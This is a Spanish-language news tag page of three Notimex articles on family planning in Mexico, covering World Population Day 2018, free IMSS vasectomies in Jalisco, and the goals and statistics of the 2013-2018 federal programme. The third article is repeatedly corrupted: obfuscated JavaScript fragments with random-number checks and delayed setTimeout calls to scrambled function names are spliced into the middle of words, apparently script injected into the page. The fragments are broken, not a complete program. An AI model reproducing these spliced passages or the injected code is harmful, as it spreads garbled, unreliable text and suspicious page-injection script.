Etiquetas: Planificación familiar


Planificación familiar, 50 años de ser reconocida como derecho humano

11 julio, 2018

México. El secretario de Gobernación, Alfonso Navarrete Prida, destacó que hace 50 años la planificación familiar fue reconocida mundialmente como un derecho humano, la cual incide de manera directa en la reducción de la pobreza y en el desarrollo de las familias.

En el marco del Día Mundial de la Población, que se celebra el 11 de julio, este año se centra en el reconocimiento de la planificación familiar como derecho humano, cumpliéndose 50 años de la Conferencia Internacional de Derechos Humanos de 1968, cuando la planificación familiar fue reconocida por primera vez.

“Hace 50 años la planificación familiar fue reconocida mundialmente como un #DerechoHumano. Esta incide directamente en la reducción de la pobreza y en el desarrollo de las familias. #DMP2018 @SEGOB_mx”, escribió en su cuenta de Twitter @navarreteprida.

De acuerdo con el Consejo Nacional de Población (Conapo), la planificación familiar contribuye al desarrollo humano, al ampliar capacidades y libertades de mujeres y hombres para llevar a cabo proyectos de vida.

Mencionó que esta fecha El #DMP2018 prioriza las acciones de las dependencias del @gobmx para fortalecer #LaPlanificaciónFamiliarEsUnDerechoHumano ¡Infórmate y decide!

Además, invitó a la población a informarse y decidir el rumbo de tu plan de vida. Evita un embarazo no planeado. Únete a las acciones por el #DMP2018.

El 11 de julio de 1987 nació en el planeta el habitante cinco mil millones, razón por la cual la Asamblea General de Naciones Unidas decidió declarar esta fecha como el Día Mundial de la Población.

Ello, con la finalidad de reflexionar sobre la importancia de los fenómenos demográficos como natalidad, migración y mortalidad y su vinculación con el Desarrollo; además, esta fecha invita a la consolidación de la cultura demográfica al motivar la participación de las personas ante los actuales retos demográficos.

La conmemoración de esta fecha destaca la urgencia e importancia de atender diversos aspectos sobre población y desarrollo como son la salud sexual y reproductiva, la equidad de género, la migración, el desarrollo sostenible y el envejecimiento.

Fuente: Notimex


Vasectomía, la sencilla alternativa de planificación familiar

9 junio, 2018

Guadalajara. El cirujano urólogo del HGZ 89, Hugo Ruvalcaba Naranjo, dijo que la vasectomía, alternativa de planificación familiar, es muy sencilla de hacer y trae grandes beneficios a los hombres que tienen una paternidad satisfecha, es que decir, que ya tuvieron la cantidad de hijos que deseaban.

“Es un procedimiento muy bien aceptado y tolerado por los pacientes que llegan, ellos son los que lo recomiendan a sus familiares, conocidos, compañeros de trabajo, y se va haciendo la cadenita de buenas experiencias”, afirmó.

Explicó que después de la vasectomía lo recomendable es guardar reposo relativo (no absoluto) por un periodo de tres a cuatro días, así como colocar compresas de hielo en el área genital para reducir la inflamación en un lapso de entre 24 a 48 horas.

Además, el uso de ropa interior ajustada ayuda a que el escroto tenga menor movilidad y se recupere más rápido.

Ruvalcaba Naranjo recordó a la población que la vasectomía no interfiere en el deseo ni la potencia sexual, puesto que el conducto que se cierra no trasporta ninguna hormona, sino que sólo es el puente para que los espermatozoides salgan durante la eyaculación.

Por ello, del 12 al 15 de este mes, los derechohabientes y no derechohabientes del IMSS en Jalisco, podrán acudir a tres unidades médicas de esta capital para realizarse la vasectomía de manera gratuita.

En un comunicado, la directora del Hospital General de Zona (HGZ) no. 89, María Rosalina Orozco Pérez, informó que quienes deseen realizarse este procedimiento de mínima invasión deberán hacer su cita para realizarse estudios que incluye biometría hemática para determinar tiempos de coagulación.

En caso de que el paciente tenga comórbidos, es decir, que sea diabético o hipertenso, también se le realiza una prueba de urea creatina, todo con la finalidad de que la vasectomía le cause la menor cantidad de molestias posible, indicó la funcionaria.

Explicó que, además del HGZ no. 89, también las Unidades de Medicina Familiar (UMF) no. 34 (Legazpi y Colón) y 92 (Miravalle), del Instituto Mexicano del Seguro Social (IMSS), realizarán estas intervenciones.

Fuente: Notimex


Planificación familiar, esencial para favorecer la salud y derechos de la población

2 agosto, 2017

México. La planificación familiar es un elemento esencial para favorecer la salud y contribuir al ejercicio de otros derechos de la población; para ello el Gobierno Federal tiene entre sus retos para 2018, asegurar y facilitar la calidad de los servicios en el país.

También atender el rezago en áreas y grupos específicos de la población; incentivar la participación del hombre en la planificación familiar y en la paternidad responsable, así como fortalecer la coordinación interinstitucional e intersectorial.

Entre los derechos a los que contribuye esta acción destaca el decidir el número y el espaciamiento de los hijos; por lo cual las estrategias del Programa de Planificación Familiar 2013-2018 contribuirán a lograr un México incluyente.

La planificación familiar es el conjunto de prácticas empleadas por mujeres y hombres para el control de la reproducción, a fin de decidir el número de hijos que se desea tener; además, abarca educación, prevención y tratamiento de las enfermedades de transmisión sexual, el asesoramiento antes de la concepción y durante el embarazo, así como el tratamiento de la infertilidad.

Al tomar como base los rezagos en materia de planificación familiar y anticoncepción en México, el programa se plantea tres objetivos a efecto de contribuir a que la población disfrute de su vida sexual y reproductiva de manera informada, libre, satisfactoria, responsable y sin riesgos.

Ellos son: incrementar el acceso efectivo a servicios de planificación familiar y anticoncepción, y mejorar la calidad de la atención; cubrir las necesidades específicas en esa materia, en particular en grupos en situación de desventaja social, e incentivar la paternidad activa y elegida, así como la responsabilidad del hombre.

Este programa de acción específico plantea alcanzar, al término de la presente administración, ocho metas: cobertura de anticoncepción post-evento obstétrico de 70 por ciento y prevalencia de uso de anticonceptivos de 76.7 por ciento en Mujeres en Edad Fértil Unidas (MEFU).

También reducir a 6.7 por ciento la demandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}a insatisfecha de métodos anticonceptivos en MEFU; a 5.9 puntos porcentuales la brecha de prevalencia anticonceptiva entre las MEFU de áreas urbanas y rurales, así como a 9.3 puntos entre las MEFU indígenas y no indígenas.

Otros objetivos son bajar a 11 puntos porcentuales la brecha de prevalencia anticonceptiva entre MEFU de las cinco entidades federativas con prevalencias más altas y las cinco más bajas; incrementar a 14.2 la tasa de vasectomías en hombres de 20 a 64 años de edad, y aumentar a 24.6 por ciento la participación masculina en el uso de métodos anticonceptivos.

La Secretaría de Salud resaltó en un documento que los servicios de planificación familiar instituidos en el país han sido un factor determinante en la reducción de la fecundidad y del ritmo de crecimiento de la población.

Además de que han contribuido a mejorar la salud reproductiva de la población, en particular en lo que corresponde a la reducción de la mortalidad materna y perinatal.

En las últimas cuatro décadas se ha observado una disminución en el número promedio de hijos por mujer, al pasar de 6.8 en 1970 a 2.3 en 2010; mientras que en la actualidad, la tasa global de fecundidad es de 2.2 hijos por mujer, cercana al nivel de reemplazo generacional, que es de 2.1, y que se estima se logrará después de 2025.

Hacia finales de la década de los setenta, el país alcanzó su nivel más alto de crecimiento poblacional, con una tasa de 3.5 por ciento anual, determinado por una elevada fecundidad (42 por cada mil habitantes) y una baja mortalidad (10 por cada mil habitantes).

Posterior a este periodo, la tasa de crecimiento de la población mantuvo un decremento sostenido al pasar de 3.2 por ciento en 1970 a 1.9 por ciento en 1990, y a 1.4 por ciento en 2010; con ello se estima que para 2018 ese indicador se ubicará en uno por ciento.

Las acciones de planificación familiar y anticoncepción están orientadas a personas en edad reproductiva; no obstante, la cobertura de los servicios se ha medido en términos de Mujeres en Edad Fértil Unidas (MEFU), esto es: de 15 a 49 años de edad casadas o en pareja.

También se empezó a calcular la cobertura del programa con relación a las Mujeres en Edad Fértil Sexualmente Activas (MEFSA), que se refiere a féminas de 15 a 49 años de edad que tuvieron relaciones sexuales durante el mes previo a la entrevista.

Aunque los avances logrados en México durante casi cuatro décadas de políticas públicas en materia de planificación familiar son importantes, aún son insuficientes, por lo que el Gobierno Federal plantea desafíos para atender las demandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}as y necesidades de la población con un enfoque de derechos humanos.

Al ser parte esencial del derecho a la salud, la Organización Mundial de la Salud (OMS) propuso el 3 de agosto de cada año para conmemorar el Día Internacional de la Planificación Familiar, a fin de difundir información sobre los diferentes métodos y sus ventajas para la prevención de embarazos no planificados e infecciones de transmisión sexual.

De acuerdo con el organismo internacional, se calcula que en los países en desarrollo unas 214 millones de mujeres en edad reproductiva desean posponer la procreación, pero no utilizan ningún método anticonceptivo moderno.

Ello debido al acceso limitado a la anticoncepción, por temor a efectos colaterales, oposición por razones culturales o religiosas, servicios de mala calidad, errores de principio de los usuarios y los proveedores y barreras de género.

Destaca que la planeación brinda a las mujeres, familias y a la sociedad diversos beneficios, como prevenir riesgos para la salud relacionados con el embarazo, reducir la mortalidad de los menores de un año de edad, evitar la infección por el Virus de Inmunodeficiencia Humana (VIH) y, por ende, el Síndrome de Inmunodeficiencia Adquirida (Sida).

Además contribuye a disminuir la necesidad de recurrir al aborto peligroso, poder de decisión, menos población, a aminorar el embarazo de adolescentes, mayor calidad de vida para cada uno de los integrantes de la familia, mermar la violencia intrafamiliar, así como más desarrollo personal y profesional para la pareja.

La OMS señaló que el uso de anticonceptivos ha aumentado en Asia y América Latina, pero es bajo en África, y a nivel mundial ha registrado un incremento, al pasar de 54 por ciento en 1990 a 57.4 por ciento en 2015.

El empleo de esos métodos por los hombres representa una proporción pequeña y por lo general se limitan al condón o la esterilización (vasectomía).

Avances del Programa de Planificación Familiar

En México, el Programa de Planificación Familiar ha tenido avances, pero aún enfrenta retos para hacer efectivo el ejercicio del derecho que tienen hombres y mujeres a decidir el número de sus hijos.

De acuerdo con el Programa de Acción Específico Planificación Familiar y Anticoncepción 2013-2018, una característica distintiva ha sido su continua evolución, incorporandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o los avances científicos y tecnológicos.

En esa tarea, la participación de las organizaciones de la sociedad civil y de agencias de cooperación internacional ha sido fundamental en la prestación de servicios y en el diseño de políticas públicas.

Entre los avances que se tuvieron de 2006 a 2012 destaca la prestación de los servicios de planificación familiar y anticoncepción, como resultado de la interacción de las políticas gubernamentales y la actitud de la población hacia este tema, entre otros aspectos, donde sobresale la necesidad de incentivar la participación del hombre en estas acciones.

De acuerdo con el Fondo de Población de las Naciones Unidas (UNFPA), los anticonceptivos otorgados por ese organismo en 2015 tuvieron el potencial de prevenir 12.3 millones de embarazos no deseados, 4.4 millones de abortos, 220 mil muertes infantiles y 34 mil fallecimientos maternos.

En México, la tasa de embarazos no planeados y no deseados en mujeres de 15 a 49 años es superior a 36 por ciento; en el caso de la población adolescente, este indicador es mayor a 48 por ciento.

La demandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}a insatisfecha por anticonceptivos en mujeres de 15 a 49 años es de 11 por ciento; además, 54 por ciento de los embarazos no planeados en México son resueltos con un aborto inducido.

El porcentaje de mujeres adolescentes de 15 a 19 años con demandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}a insatisfecha de métodos anticonceptivos es de 28.2 por ciento a nivel nacional.

Con base en estimaciones del Instituto Nacional de Estadística y Geografía (Inegi), en 2015 se registraron dos millones 353 mil 595 nacimientos a nivel nacional. De éstos, se estima que 18.2 por ciento fueron de madres menores de 20 años; lo que significa que se presentaron 423 mil 647 nacimientos en adolescentes al año.

A nivel nacional, el porcentaje de MEFSA que reportó que su pareja se realizó la vasectomía o que utiliza condón o métodos tradicionales (ritmo o retiro) fue de 17.8 por ciento en 2009 y de 18 por ciento en 2014; es decir, una de cada seis mujeres cuenta con la participación activa del varón en la planeación y prevención de embarazos o de una infección de transmisión sexual.

El uso de la vasectomía como método se mantiene casi estable y en porcentajes muy bajos (2.4 por ciento en 2014); se comprueba que aunque esta práctica no quirúrgica es efectiva, segura y rápida, con pocos efectos secundarios, sigue siendo mucho menos utilizada que la salpingoclasia.

La planificación familiar está incluida en los Objetivos de Desarrollo Sostenible, y su cumplimiento depende en parte de la capacidad para que las mujeres puedan ejercer sus derechos reproductivos.

Fuente: Notimex